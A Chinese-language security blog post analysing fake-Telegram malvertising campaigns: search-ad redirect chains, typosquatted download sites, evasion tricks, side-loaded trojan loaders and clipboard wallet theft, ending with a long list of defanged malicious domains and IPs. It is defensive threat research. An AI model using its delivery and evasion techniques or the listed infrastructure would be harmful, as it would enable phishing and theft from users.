目前该攻击类型的主要受害者是tg中文用户，固然tg中的坏人含量相当高，但是对于像金融、贸易、区块链等这些带有跨境业务性质的甲方安全来说，个人认为这是一个不容忽视的风险点。今天能替换你员工剪贴板，明天就能给你域控下发个 lock.exe 天下大乱。

换了个方向写流水账，欢迎拍砖。

TL;DR

搜索引擎分类

Google

目前Google是该攻击类型的主流平台，因为telegram的使用需要XFW以外的网络，也就意味着具备该网络条件的用户一般也具备浏览谷歌的条件。截至目前为止的相当长一段时间内，直接在Google搜索 “telegram” 相关的关键字，返回的搜索结果中的前1-4条一般都会带有 “AD” 或 “赞助商” 这种标识，这些广告结果当中绝大多数都是有所图谋的恶意攻击者故意投放的 “有毒” 广告。

Bing

Bing搜索引擎也具有付费广告服务，但是使用bing搜索引擎直接搜索 “telegram”、“纸飞机” 等关键字的话，得到的页面是被过滤和筛选后的，猜测是因为政策原因导致搜索结果均是新闻网页。

但是该屏蔽政策似乎没有兼顾所有的关键字，使用关键字 “电报”、“电报中文版” 等关键字仍然可以得到真实的搜索结果，其中包含广告结果以及使用SEO等手段将排名做的很靠前的假冒官网。

广告投放筛选条件

详细分类的话，广告投放大致分为地理位置、语言、意向群体、关键字这几类。

但是站在自动化搜寻并封禁的角度，我们的方向可以有：语言、IP归属、地理位置、关键字、时段、搜索次数、客户端UA等，尽量满足这些条件去主动迎合恶意攻击者的投放群体画像，以此来达到最佳的封禁效果。

下面仅举例几个对搜索结果影响较大的关键要素，不一一赘述。

语言

简体中文搜索结果

繁体中文

英文搜索结果

关键字

以telegram中文版为关键字

以纸飞机中文版为关键字

以电报中文版为关键字

客户端

直接展示移动端的搜索结果，根据部分搜索结果的网站标题可以看出，其目标群体为安卓用户，这些搜索结果使用PC桌面端的user-agent是无法触达的。

位置

Google的广告投放按照位置来区分可以简单的分为顶部和底部两种，顶部的广告展示位于真正的搜索结果之上比较引人注目，转化率可能会相对较好，但是容易被人忽略的底部广告位也存在telegram钓鱼攻击广告投放的情况。

中转页面

中转页面即为搜索引擎给出的搜索结果，攻击者一般会围绕 ”白利用“ 的思想采用各种手段保证中转页面的合法性，下面介绍的是结合日常安全运营工作当中发现的主流中转手法。

YouTube频道页面

YouTube是最传统、在搜索结果中最常见的中转方式，从最初出现到现在可能达到数年之久。

目前为止基本只有一种形式，即创建一个名称为 “telegram中文版” 相关的YouTube频道，频道的背景、介绍话术、头像、各种图标ico等均设置为telegram相关，给搜索者一种telegram官方制作的推广页面的感觉。

然后频道详情页面下方的超链接被设置为恶意的链接，以此引导用户浏览假冒的telegram官网等页面，直至用户下载安装假冒的telegram客户端。

频道链接指向问题

在以往的应急过程中，大多数情况下频道页面下面的6个超链接对应的跳转链接是一致的。

需要注意的是，虽然不是很常见，但是有时会遇到六个超链接对应的跳转链接不一致的情况，所以手动排查和自动化搜集时应该注意这个问题避免遗漏。

YouTube搜索频道

YouTube支持根据关键字搜索频道，不过搜索结果当中作品和频道是混在一起的。根据这个思路可以直接通过搜索关键字的形式找到这些假冒的频道页，再提取详情介绍里面的超链接，批量封禁。

并且根据实际观察到的情况来看，大多数实际触达到用户的频道基本都是提前建立的，提前时间在几天到一两个月不等。个人猜测攻击者准备资源、通过审核可能也需要一定的时间，所以这种方式封禁域名有一定的预判作用，时效性的效果可能会好一些。

Google文档

Google文档即为谷歌官方提供的在线文档服务，使用Google文档作为中转页面的手法出现时间相对较短，不过也是目前出镜率相对较高的一种中转方式。

搜索相关关键字时，可以看到推广域名是 docs.google.com。

链接对应的实际就是攻击者设计好的谷歌在线文档，文档假冒telegram推广相关主题，下载文本的超链接同样被设置为恶意地址，诱导用户继续访问假冒telegram官网或直接返回恶意telegram客户端的下载地址。

Google Site

该攻击方式的思想与Google文档相似，均是利用Google提供的第三方服务作为中转恶意地址的 “白名单” 基础设施。Google Site本身为Google的一款以Wiki为基础的在线网站制作系统，为Google Apps的一部分，一般被用来搭建基础的展示网页。

搜索相关关键字时，有时可以得到域名为 ”sites.google.com“ 的搜索结果。

点击链接后，可以发现攻击者使用Google sites的服务创建了一个仿冒telegram官网的web站点，最醒目处的两个按钮就是恶意客户端的下载地址。

上图展示的是为Windows PC准备的钓鱼网站，针对移动端的钓鱼攻击同样也有使用Google sites作为中转页面的案例。

搜索引擎语法

接触过信息安全的人可能都对Google hacking不陌生，因为早几年网上的教程基本都是从 ”信息搜集“ 开始讲，信息搜集教学当中经常就会带有Google hacking语法教学这种环节，其中比较常见的大概是 inurl、filetype、site 这些语法，其中site、inurl 语法都有筛选指定的网站搜索结果的功能，并且比较通用的语法基本对大型的搜索引擎都是适用的。

Google 搜索语法

当发现搜索结果中的推广地址为 www.google.com 的时候，对应的就是攻击者利用谷歌搜索语法的结果。

点击推广的结果后，可见链接地址对应的是针对某个特定的假冒telegram官网域名的搜索引擎语法搜索结果，攻击者利用inurl语法使telegram只展示位于该假冒域名下的url搜索结果，受害用户不管点击哪个搜索结果，最终都将在攻击者的假冒官网上下载假冒的客户端。

Bing 搜索结果

搜索结果中可以看到域名为 www.bing.com

点击后发现攻击者同样是想通过site语法来限定搜索结果为特定的假冒官网地址

但是由于上文提到过的疑似特殊原因，使用Bing中转似乎不是一个很稳定的选择

直接跳转假冒官网

有时也能看到攻击者直接将自己搭建的假冒官网作为推广地址的案例

用户在搜索页面点击搜索结果后，会直接跳转到假冒官网地址

假冒的telegram官网域名当中绝大多数围绕 ”telegram“ 这个关键字，但是也能见到少数没有规律的域名作为推广结果的案例。

小众搜索引擎

像 www.discovertoday.co 、hk.top10quest.com 这类的域名具备搜索引擎的功能，但是又没有听说过的网站，我暂且称之为 ”小众搜索引擎“，该类网站的特点是 ”也具备广告位的设定，并且广告特别多“。

Google搜索钓鱼广告中也曾出现过利用这些 ”小众搜索引擎“ 二次跳转的案例。

进入此类搜索引擎的搜索页面后，位于顶部的仍然是广告投放的恶意推广结果。

印象笔记

跟踪过程中也曾经发现印象笔记被攻击者短暂的利用过一段时间，即 www.evernote.com 的域名会出现在推广广告列表中。但是不知道出于何种原因，现在基本已经看不到这种中转方式了。

利用思路与Google文档类似，都是利用文档服务制作一个假装推广telegram的展示页面，诱导用户点击下载链接。

telegram关键字网站

该类型搜索结果与广告投放无关，一般出现在除广告推广结果、真实telegram官网之外的位置。

此类假冒网站基本可以分为两种工作原理：

1. 网站本身主打的就是 ”telegram官网“，通过各种SEO方式将网站排名优化的特别靠前，如果用户直接忽略掉了推广结果浏览下方搜索结果，或者用户使用了广告屏蔽浏览器插件等，就很容易点击进入此类假冒官网下载假冒的客户端。

   

2. 
   

   网站定位是主要围绕 ”telegram“ 这个关键字的资讯类网站，本身并不提供下载服务，但是很容易被搜索相关资料的用户点进去，网站上一般在顶部或者其他位置放置真正的假冒官网的跳转地址，诱导用户点击。

   
   

   
   

   
   

   
   

   

   
   

   

被SEO利用的无关站点

这种情况多数是站内的search功能被黑帽SEO滥用了，最终效果就是大型的网站被利用来做黑灰关键字的推广。

疑似Google商店

在观察排名靠前的几个telegram关键字时，发现 “纸飞机群组” 这个关键字可以搜索到一个排名比较靠前的Google Play的结果。

软件icon跟名称来看，主打 “中文”、"福利"，并且该软件似乎也只是谷歌应用商店当中上架的非官方app之一。

关于该软件的比较有意思

中转页面跳转

用户在搜索引擎给出的搜索结果中点击了不可信的内容后来到中转页面，中转页面一般还会有至少一次跳转，中转页面的跳转涉及多个维度的信息，概括如下。

自建假冒官网

攻击者搭建的假冒telegram官网是该类型钓鱼攻击当中的主战场。中招的用户将在该页面下载假冒的客户端，走完成为受害者的最后一步；防守者也将提取官网的域名、文件下载的地址进行告警和封禁。因为前面的几个步骤当中，攻击者利用的资源都是白名单资源，防守者无法有效的拦截和封禁，只有像 ”假冒官网“、”下载地址“、"C2地址" 这些自定义的东西才具备针对性治理的条件。

攻击者搭建的假冒官网在视觉上一般会模拟真实官网的形态，偶尔也有一些是自创的UI，但是最终目的一定是设法让用户点击恶意客户端的下载链接，实现钓鱼。

假冒官网域名特征

假冒官网的标配就是模拟 ”telegram“ 这个关键字的相似域名，攻击者的手法基本围绕 ”冷门后缀“、”字母移位“、”单词缺字“、”重复字母“、”相似字母替换“、”加单词造域名“ 这些，此处不赘述。

不过需要注意的是，有几个telegram官方的域名不是很常见，有时候会混杂在攻击者的假冒官网当中，需要关注下避免误封的问题。

telegram.com
cdn4.telegram-cdn.org 
updates.tdesktop.com 
web.telegram.org

在线快速建站服务

甲方一般都遇到过使用ipfs域名、国外快速建站域名等服务发钓鱼邮件的，一般这种域名都是个壳，实际收信的地址在远端。fake tg 同理，例如：

客户端选择

进入官网后一般就是客户端的选择下载，比较常见的大多数情况是攻击者主打Windows系统的假冒客户端，所以剩下的几个系统的下载地址均设置为跳转telegram官方的下载地址。

或是攻击者主打安卓系统的假冒客户端，网站尺寸都仅为移动端设置，除安卓下载地址外其他系统下载地址返回官方下载地址。

剩下的情况基本就是无论点击哪个类型的下载按钮，返回的都是攻击者设置好的下载地址，文件类型都是固定的。

另外分析过程中有遇到过比较特殊的情况，攻击者为IOS系统也准备了相应的假冒客户端，下载地址是自签app的托管页面，会要求用户信任描述文件。

下载功能

受害者选择完客户端后，流程就到了下载部分。攻击者在这部分的工作主要是bypass或者保证存活、方便分发之类的工作，此处简单阐述几种情况。

直接超链接

1. 
   

   最常见的情况就是下载按钮直接对应超链接，这种方式用户在正常的浏览形态下，把鼠标放到按钮上即可看到下载链接，只是基础的下载功能，不具备什么隐蔽性。

   

   
   

   像这种跟上图中的也区别不大

   
   

   
   

   
   

隐蔽超链接

1. 还有一种情况是鼠标放上去看不见下载地址，大概分为两种设置：下载链接也在前端只不过对应的是js的事件、用户点击后后端再返回下载地址。

   

特殊下载域名

1. 下载功能使用了特制的下载域名，封禁角度来说就多了一个封禁的点。

   

   

特殊下载页面

1. 经常可以看到一款自定义的下载页面，会在返回给用户下载地址后关闭，猜测可能是攻击者分发文件或者bypass chrome下载功能的手段。

   

条件检查

1. 假冒官网首页反调试

   

2. 跳转专用的下载域名

   

3. 直接访问下载地址返回404

   

4. 分析后发现Windows的UA无法得到真实的下载地址

   

5. UA为安卓客户端时才会返回正确跳转地址，攻击者采用这种方式来保护自身下载地址。

   

域名随机分发

实际在真正到达攻击者自己搭建的假冒telegram官网之前，用户点击中转页面的跳转链接后，也存在bypass的细节。

曾经在分析过程中发现点击假冒官网链接后， 前后两次得到的官网地址不唯一，后来发现攻击者采用了一种随机分发域名的思路，以此来保证存活率。

文件托管

文件托管部分理论上应该是在自建假冒官网部分中的，但是由于有时Youtune这些中转页面下部的超链接对应的就是文件托管地址，没有假冒官网这层中转步骤。以及文件托管部分也具备一定的bypass功能，所以单独在这里介绍。

OSS下载链接

从下载链接的维度来说的话，除攻击者自己申请的下载域名外，最常见的就是使用阿里云OSS来托管恶意客户端。

除阿里云oss服务外，也有使用腾讯云oss、AWS oss服务的案例。

网盘等白服务

攻击者使用oss托管文件的方式虽然是使用了第三方的服务，但是oss域名绝大多数都是唯一的域名地址，所以仍然可以进行劫持或者阻断。但是有些案例当中，攻击者使用了网盘等白服务的下载直链作为下载地址，地址中的域名是服务方的不唯一域名，封禁的话就可能会影响正常业务。

onedrive案例

点击下载按钮后，返回了OneDrive的下载链接。

Filebin案例

filebin是公用的文件托管服务，此处返回的下载地址是 filebin.net

HFS等非主流渠道

有时也能够看到下载地址是基于纯IP开放的web服务，这种情况多半是攻击者自己搭建的HFS服务。

另外一个案例

特征狩猎

像HFS这种情况，服务的特征还是相当明显的，我们可以使用使用FOFA等互联网资产搜索引擎来过滤出被采集到的恶意服务。

该搜索结果风格基本是单服务、单IP。

该搜索结果风格是多域名、单IP，可见攻击者比较偷懒，注册了多个垃圾域名均解析到了单个IP开启的服务。

当然了，直接根据关键字去匹，也能匹配到不少假冒官网。

客户端类型

客户端类型相关的信息量较少，需要注意的基本只有格式、命名两点。文件格式变换可能是出于免杀、bypass chrome下载文件安全提醒考虑，安装包文件名则可能主要用来欺骗用户。本文更侧重于自动化封禁处理的角度，这里不再赘述。

常见C2特征

日常分析对C2接触不算多，此处仅介绍几个接触过的比较有代表性的场景：

1. 常见恶意客户端的使命无非两个：释放出中文版telegram给用户使用、运行木马。目前最常见的木马运行方式即为 “白加黑”，攻击者一般会选用迅雷、某些游戏客户端等的exe组件作为加载恶意dll的载体。

2. 对于比较传统的MSI后缀流派，7z的分析效果比较好（要看具体场景）。以某次直接释放MFC木马的假冒telegram客户端为例：

   以某次使用 “白加黑” 手法的Firefox钓鱼客户端为例（很多假冒tg客户端也是同样的手法）：

   

3. C2木马具有复杂性提升的发展趋势。最初比较常见的木马释放流程就是安装包释放出loader，loader运行加密的shellcode，但近期分析的木马却更加复杂一些。

   
   

   
   

   下图案例中的exe安装包将释放出msi安装包、压缩文件包、PE文件，msi安装包释放出downloader（downloader疑似也是一个被恶意利用的组件）。

   
   

   

   downloader在有道云笔记相关的分享链接下载加密的压缩文件 A.jpg

   

   
   

   
   

   
   

   压缩文件下载到本地后，安装程序解压出被分割的恶意loader dll文件，本地拼接后白加黑将loader运行起来，再解密并动态加载之前释放出的加密的恶意动态链接库。

   
   

   木马运行后通过添加防火墙规则、复制多个自身、添加计划任务等手段进行权限维持。

   

   并且该恶意客户端采用了大量的反沙箱设置，整个安装过程就长达五分钟。

   

4. 部分木马具有 “牺牲部分上线率来提升存活率” 的思想。以下案例中的恶意客户端在用户安装完毕后，并不会完成木马的上线工作。而是将用户安装后的telegram的快捷方式修改为木马上线的命令行，用户在第一次运行假冒telegram的时候才会将恶意木马解压运行起来。

5. 木马多样性趋势。最初在了解范围内的木马基本无外乎 Cobalt Strike、大灰狼 这些传统远控（病毒特征码FatalRat、Zegost这些），后来有遇到过之前没有见过的websocket协议木马。

攻击者目的

目前该攻击方式最常见的攻击目的即替换受害者剪贴板中的钱包地址实现盗币，但是在日常分析和其他分析报道中也能看到其他目的的攻击者。

其他信息

安全厂商报道

目前已有多家国内安全厂商进行过报道，媒体类型以微信公众号为主。前段时间ESET也发表了一篇较为详尽的文章来介绍 “针对东南亚和东亚的虚假安装程序” 攻击事件，其中最有代表性的即为假冒telegram。

原文地址：https://www.welivesecurity.com/2023/02/16/these-arent-apps-youre-looking-for-fake-installers/

相似攻击手法的其他软件

除telegram外，确实还存在其他多种假冒软件的攻击，如ESET文中提到的chrome、Firefox浏览器、WhatsApp、SKYPE、搜狗拼音输入法、Electrum钱包等等。

WhatsApp

chrome

Line

Electrum

SKYPE

另外除上面描述的软件之外，也有其他IT类软件的攻击痕迹，例如使用 “navicat汉化版” 关键字推广的ytb频道。

目前该域名已经被cloudflare拦截

官方的拉黑机制

虽然攻击者所使用的基础设施的反应相对迟钝，但其实也是有所动作的。

chrome的钓鱼网页拦截

Youtube频道的封禁措施

部分之前存在过的恶意YouTube频道已经404，不确定是官方的处置措施还是攻击者更换了阵地。

Google文档的跳转声明

似乎并非所有

被DMCA的域名

搜索时可以看到页面底部有时会显示有些搜索结果是被DMCA移除掉的

但是不能确定这些域名是被官方移除掉了，还是被用户举报的，抑或是竞争对手干的。

攻击者之间的竞争

比较有趣的是，在一次分析当中，我们发现攻击者会修改用户的hosts文件，屏蔽掉部分竞争对手的假冒官网域名，以此来保证自己的 "权限独享"。

假冒telegram的产业链

“盗币” telegram的开发已经成为公开的黑灰项目，时常能够见到该 "项目" 的广告。

攻击者的推广关键字

一次分析过程中，意外发现了攻击者用于统计访问的关键字，通过关键字可以看到攻击者目标人群。

https://ia.51.la/go1?id=21515153&rt=1676951579692&rl=2048*1152&lang=zh-CN&ct=unknow&pf=1&ins=0&vd=3&ce=1&cd=24&ds=全新telegram中文汉化版已上线，其中包括telegra&ing=3&ekc=&sid=1676951478109&tt=Telegram Telegram中文版&kw=telegram, 电报telegram, telegram中文, telegram汉化, telegram中文版, telegram下载, telegram中文版安卓, telegram中文版ios&cu=https://tenetgamg.top/&pu=https://www.youtube.com/

关键字：telegram, 电报telegram, telegram中文, telegram汉化, telegram中文版, telegram下载, telegram中文版安卓, telegram中文版ios

攻击者有趣的话术

不知道是否是刻意利用目标受害者的民族自豪感，攻击者在假冒安卓客户端下载处，刻意设置了一个 ”华为专用版“ 下载入口，其实背后对应的下载链接与 ”普通假冒安卓版“ 是一样的。

针对已中招用户的一个筛查思路

大多数假冒的Windows客户端在安装时基本都会在 ”程序和功能“ 注册表项进行新软件注册，假冒telegram客户端程序也有自己的特征，可以在EDR、准入等会统计客户端软件列表信息的地方以排查telegram关键字、排查特殊符号等思路来筛查已经安装的用户。

嘿客竟在我身边

微信群里偶然看到有人咨询如何解决下载exe文件时chrome报毒的问题

文件名称命名流派属于上文提到的 ”官方写实派“

下面又在咨询谷歌快照的收录问题

以及苍白的辩解

根据以上特征可以推断出此人极大概率是个假TG站长

漏洞

有套模板用了低版本shiro，可以打个550。安骑士守护，值得信赖。

app分发也有

分享下ioc

写完有一段时间了，发现近几天谷歌封禁的速度貌似快了起来，整这些活的貌似也少了不少，遂赶紧发出来蹭个尾巴。

分享一波目前收集到的域名，共计608个，其中绝大多数是围绕 fake_tg 的官网、下载域名、C2、相似攻击ioc。

未打码版放在夏老师星际黑客文档：https://txt.xj.hk/fake_t

f[.]nkking[.]com
103[.]212[.]231[.]151
download3[.]htfoifm[.]xyz
tg-telegram[.]vip
teleprannm[.]com
down[.]tg-zc[.]com
tg-zc[.]com
zhlatrst-38tgle[.]org
jungen[.]oss-accelerate[.]aliyuncs[.]com
daboluo-dl[.]netlify[.]app
telegrem-zg[.]netlify[.]app
tgdsafsagoogle[.]oss-cn-hongkong[.]aliyuncs[.]com
tg-ch[.]com
tgelegramch[.]xyz
telegrarn[.]eu
tgsgp[.]oss-ap-southeast-1[.]aliyuncs[.]com
zh-telegram[.]net
rhfudncm[.]xyz
telegramr[.]co
telegrarn[.]work
telepanm[.]top
telegram[.]kiwi
telegam[.]health
uv7zzq[.]dm[.]files[.]1drv[.]com
telegrarn[.]one
taleglam[.]com
www[.]talesgian[.]com
www[.]telegram-tgp3[.]com
www[.]telegram-tgp5[.]com
telegrarn[.]in
telegrann[.]oss-cn-hongkong[.]aliyuncs[.]com
telegarn[.]org
teledown1[.]oss-cn-hongkong[.]aliyuncs[.]com
telegrma[.]cc
telegarsm[.]com
www[.]tg-telegram[.]pro
download90[.]srdna[.]com
telegram[.]training
ttelte[.]oss-cn-hongkong[.]aliyuncs[.]com
wahadp[.]com
download[.]dsvcfwp[.]cn
www[.]tg-telegram[.]org
789-1306961415[.]cos[.]ap-hongkong[.]myqcloud[.]com
www[.]telegram-com[.]cc
tg-telegram[.]pro
telegramzh[.]cc
download[.]telegram[.]lgbt
telegramzw[.]com[.]cn
yyds10133[.]oss-accelerate[.]aliyuncs[.]com
telergam[.]live
122121ffff[.]oss-cn-hongkong[.]aliyuncs[.]com
tehegiam[.]com
tellegram[.]group
telegraem[.]oss-cn-hongkong[.]aliyuncs[.]com
telegraem[.]cn
xgtele[.]oss-cn-hongkong[.]aliyuncs[.]com
telegraem[.]vip
tlssatwla[.]com
telegrarn[.]pw
www[.]telegram-o[.]cc
apk[.]telegramx[.]me
789822[.]oss-cn-hongkong[.]aliyuncs[.]com
tg-zw[.]com
teleglam-zz[.]com
e80255c45d527cc415b7526391f6d9f5[.]oss-accelerate[.]aliyuncs[.]com
hx4fne[.]gz3k[.]world
k4n[.]8uft[.]world
w[.]kuai-lian[.]vip
gg[.]telenet[.]vip
tg-telegram[.]biz
tg-telegram[.]org
2a561b9384674c115296be162e54ee6e[.]oss-accelerate[.]aliyuncs[.]com
telegmas[.]com
xkck-dl[.]netlify[.]app
telegremkz[.]com
www[.]telegremkz[.]com
telegrarn[.]win
1231313879[.]oss-cn-hongkong[.]aliyuncs[.]com
telegram-zz[.]com
telegram-download[.]cloud
tpcsy[.]oss-cn-hongkong[.]aliyuncs[.]com
teleegram[.]art
www[.]telegarsa[.]life
www[.]telegarsc[.]top
telegram-download[.]fun
telegram-download[.]cyou
www[.]talagem[.]com
talagram[.]shop
zsdownload1[.]oss-cn-hongkong[.]aliyuncs[.]com
www[.]tellagrem[.]com
telegrem-zg[.]com
telegkam[.]com
telegrarmcnzz[.]com
telegram-1313815604[.]cos[.]ap-singapore[.]myqcloud[.]com
telegrmam[.]org
www[.]telegradm[.]com
teyegarm[.]org
www[.]telegramxi[.]com
570c805dc6a7845a6733f91b7196bed0[.]oss-accelerate[.]aliyuncs[.]com
telegroms[.]com
www[.]teleam[.]health
telegream[.]tv
tg-zhongwen1[.]cc
web[.]mjlfyqrr[.]xyz
www[.]telegram--download[.]com
www[.]telegaarm[.]com
telepram[.]com
xvsdgvgsdrbg[.]oss-cn-hongkong[.]aliyuncs[.]com
download69[.]srdna[.]com
download[.]telegramc[.]xyz
www[.]telegramm[.]vip
telegloam[.]com
137[.]220[.]146[.]224
www[.]telegramvip[.]xyz
telegrano[.]org
www[.]telegramgl[.]com[.]cn
telegarmd[.]com
zstelegram[.]oss-cn-hongkong[.]aliyuncs[.]com
451bf881a688a12c8ff794d089531831[.]oss-accelerate[.]aliyuncs[.]com
www[.]tleamaa[.]com
telegcrem[.]com
telegreng[.]com
www[.]tellegram[.]zone
tellegram[.]host
telgram[.]health
btcdl[.]netlify[.]app
telegarmm[.]netlify[.]app
29e221f1ca4868201606d3[.]oss-accelerate[.]aliyuncs[.]com
telegcerm[.]com
www[.]telegeram[.]ink
apk-telegram[.]com
telegramr[.]xyz
telegram-a[.]org
www[.]telegramm[.]ink
telergam[.]top
afsaf1[.]oss-cn-hongkong[.]aliyuncs[.]com
www[.]telelgrzm[.]com
drhhrddtery2[.]oss-cn-hongkong[.]aliyuncs[.]com
www[.]tleamoa[.]com
felegram[.]lol
telegarm[.]one
telegrarm[.]art
tele[.]bkve[.]cn
m[.]teoegram[.]com
www[.]buchananapp[.]com
app[.]buchananapp[.]com
pc[.]buchananapp[.]com
upload[.]buchananapp[.]com
172[.]67[.]173[.]103
104[.]21[.]72[.]9
telegramdo[.]oss-cn-hongkong[.]aliyuncs[.]com
telegrma[.]vip
dows[.]kuai-lian[.]vip
tenetgamg[.]top
tgelegramzh[.]xyz
telegremg[.]cc
telegrarn[.]cc
www[.]telegrarn[.]cc
teleprann[.]com
telegrmas[.]com
telegram30-chinese[.]com
telegrak[.]com
tele[.]kuai-lian[.]vip
telegrrann[.]org
telegramr[.]org
tg11184[.]oss-cn-hongkong[.]aliyuncs[.]com
www[.]talagren[.]com
e06aac69edcc89ff9b1b92e9f2528ab7[.]oss-accelerate[.]aliyuncs[.]com
123-1306961415[.]cos[.]ap-hongkong[.]myqcloud[.]com
telegarn[.]xyz
china-teleglam[.]com
telegramet123[.]oss-cn-hongkong[.]aliyuncs[.]com
telegramgc[.]com
inso-a88[.]oss-cn-hongkong[.]aliyuncs[.]com
www[.]telegrgn[.]net
qsflww[.]bn[.]files[.]1drv[.]com
www[.]telegrarn[.]ink
601f3d2aa2bda7d42f51bce0782dc81b[.]oss-accelerate[.]aliyuncs[.]com
telegrms[.]com
www[.]zhtelegram[.]org
zhtelegram[.]org
www[.]telegramzh[.]co
telegramzh[.]co
www[.]telegrbm[.]net
telegrbm[.]net
www[.]telegramom[.]org
telegramom[.]org
www[.]telegram[.]family
telegram[.]family
www[.]telegramb[.]com
telegramb[.]com
hbxvrhaw[.]bar
www[.]telogrem[.]com
download[.]teleegramvv[.]xyz
download[.]telegronm[.]xyz
www[.]telegramxe[.]org
telegaarm[.]ink
www[.]telasgram[.]com
www[.]telegroom[.]com
www[.]telegrvn[.]com
a1com[.]oss-cn-hongkong[.]aliyuncs[.]com
www[.]telegaagm[.]com
www[.]telegram-asd[.]com
www[.]telegrarn[.]us
www[.]telegrxam[.]com
www[.]telegram1[.]vip
www[.]telegrrm[.]net
www[.]teleegran[.]org
 www[.]teleegran[.]org
telegraan[.]org
teleegran[.]org
download[.]telegraam[.]vip
download[.]telegramhome[.]org
download2[.]rtgvbny[.]xyz
teracnm[.]top
download[.]telegramp[.]xyz
telegrraam[.]cuyocxs[.]cn
tele1[.]ouygqmq[.]cn
tele[.]ebimdfg[.]cn
teler[.]oabuynet[.]com[.]cn
telegramzh[.]org
telegrarn[.]com
www[.]telegcn[.]com
telegrarcn[.]com
telergem[.]org
down[.]tggdown[.]com
www[.]telegrram[.]buzz
www[.]telegarms[.]vip
bakdownload[.]srdna[.]com
download[.]tellegrom[.]com
www[.]yobestategov[.]com
tellegrom[.]com
sites[.]pqict[.]cn
cri-5amnsqb5sb53590h-registry[.]oss-accelerate[.]aliyuncs[.]com
www[.]telegrambo[.]org
china-teleglem[.]com
www[.]telegaam[.]org
tghka7[.]oss-ap-southeast-1[.]aliyuncs[.]com
zw-telegam[.]com
www[.]teleagrem[.]com
talegramn[.]org
txun[.]s3[.]ap-northeast-2[.]amazonaws[.]com
www[.]totater[.]com
k-telegram[.]app
zh-cntelegram[.]com
telecom-site[.]com
asqpqe[.]com
telegrame[.]online
www[.]cn-teiegram[.]xyz
www[.]telegramsu[.]com
telechina[.]oss-accelerate[.]aliyuncs[.]com
telebisa[.]com
abc-telegram[.]com
www[.]tgstpaa[.]top
tgbkc1[.]oss-cn-hongkong[.]aliyuncs[.]com
mi-telegram[.]com
www[.]tegygram[.]com
appmobi[.]online
tele-lyon[.]com
ryxsdg8[.]space
www[.]telegarn[.]co
super-telegram[.]com
www[.]teleramg[.]org
www[.]telegrems[.]com
www[.]telegham[.]org
download[.]telergems[.]com
telemram[.]com
www[.]tleagnz[.]com
telencgram[.]com
www[.]taijuaa[.]store
telegarm[.]shop
telegracm[.]cn
telagrcm[.]com
telegrams[.]cloud
www[.]telegramn[.]top
www[.]t-telegram[.]org
telsgrams[.]com
telegrams-app[.]org
telengrm[.]com
www[.]telegrampcn[.]com
talagram-zh[.]com
www[.]tglegram[.]org
www[.]whatsappg[.]com
teleagram[.]vip
www[.]telegrab[.]org
www[.]telagad[.]com
www[.]telagtiem[.]xyz
www[.]telegrabs[.]com
telematica-uk[.]com
telegrem[.]bid
anyrepeater[.]com
www[.]lrvr[.]org
telegram88[.]xyz
www[.]teleldcn[.]com
telegramzhcn[.]org
telegramst[.]com
www[.]telegramst[.]com
www[.]tgcn[.]cash
www[.]telegramxiazai[.]com
www[.]telegram-chinas[.]com
www[.]telegrcm[.]org
www[.]telegrsm[.]net
download3[.]fugbnh[.]xyz
en-telegram[.]com
154[.]39[.]64[.]225
telegarms[.]xyz
27[.]124[.]34[.]177
www[.]luckfafa[.]com
210[.]56[.]54[.]12
microsoftdefender[.]luckfafa[.]com
14[.]192[.]67[.]187
wpsupdate[.]luckfafa[.]com
45[.]116[.]161[.]95
45[.]116[.]161[.]95 
googleupdate[.]luckfafa[.]com
b[.]nkking[.]com
www[.]nkking[.]com
193[.]218[.]38[.]149
c[.]nkking[.]com
193[.]218[.]38[.]148
d[.]nkking[.]com
193[.]218[.]38[.]82
telergam[.]xyz
143[.]92[.]61[.]121
107[.]148[.]45[.]48
12-16[.]pinyin-sougou[.]com
107[.]148[.]35[.]6
occ-a6[.]oss-accelerate[.]aliyuncs[.]com
www[.]firefoxs[.]org
a2net[.]oss-cn-hongkong[.]aliyuncs[.]com
edfbdc7fc81abad462efa6688c19482a[.]oss-accelerate[.]aliyuncs[.]com
api18[.]srdna[.]com
download88[.]srdna[.]com
download[.]telegran[.]fit
download95[.]srdna[.]com
download[.]telebram[.]com
dhdkenxke[.]xyz
www[.]tleamaa[.]net
china-telegrme[.]com
telegorm[.]com
zh[.]slqhtz[.]cn
www[.]telegran[.]fit
telebram[.]com
telegrgm[.]xyz
f2-lang[.]oss-cn-hongkong[.]aliyuncs[.]com
dow-a15[.]oss-cn-hongkong[.]aliyuncs[.]com
dow-a11[.]oss-accelerate[.]aliyuncs[.]com
www[.]teledown[.]org
cdndown[.]shop
laohuzhi[.]oss-cn-hongkong[.]aliyuncs[.]com
download82[.]srdna[.]com
www[.]telamvz[.]com
www[.]tlergam[.]xyz
www[.]telegraysm[.]com
www[.]telamse[.]com
www[.]telamad[.]com
www[.]telamsf[.]com
www[.]telamfs[.]com
telegram-android[.]org
telegnm[.]com
telegraman[.]com
www[.]telegracm[.]org
www[.]telegramxx[.]com
www[.]telegvn[.]com
www[.]telegraxm[.]net
www[.]telegima[.]xyz
www[.]telagtiem[.]com
www[.]telegima[.]com
www[.]telegima[.]top
www[.]cn-teledown[.]com
download[.]telegramm[.]work
www[.]telegramm[.]work
telegaam[.]org
zh-telegram[.]app
www[.]tgdown[.]org
telegram[.]me
www[.]telegram[.]com[.]pe
telagran[.]com
telegramgb[.]com
telearnm[.]com
telegram[.]surf
telegramrm[.]com
www[.]telegramv[.]org
kitgafpslmj102047[.]telegrammessenger[.]xyz
telegramcn[.]org
telegriem[.]com
www[.]telegramsg[.]org
telegramlinux[.]com
telegvcn[.]com
www[.]telegramlk[.]org
5c4488d628a64861d71a396bbafbf4b2[.]oss-accelerate[.]aliyuncs[.]com
telgm-zw[.]com
telegranm[.]net
www[.]telegnam[.]com
tg404[.]com
telegramz[.]me
www[.]teleincn[.]com
54ggssdfr[.]oss-cn-hongkong[.]aliyuncs[.]com
52telegram[.]com
www[.]telegramac[.]com
telegrampc[.]org
www[.]telebigi[.]com
www[.]telegkn[.]com
www[.]telegramce[.]com
download[.]telegraema[.]com
telegram-cn[.]org
www[.]tevegram[.]com
cn-telagrem[.]com
telegrammj[.]com
www[.]telegrgm[.]com
www[.]telegcm[.]com
www[.]telegramns[.]com
www[.]telegramopen[.]co
telegmm[.]com
www[.]telegramyy[.]com
telegramcs[.]com
download[.]telegramm[.]cloud
telegrampl[.]com
telegrzm[.]com
www[.]teleylm[.]com
clomidus[.]com
www[.]webk-telegram[.]org
626f8c47c30ce[.]site123[.]me
www[.]telegraka[.]com
app[.]zhaixz[.]com
telegramgi[.]com
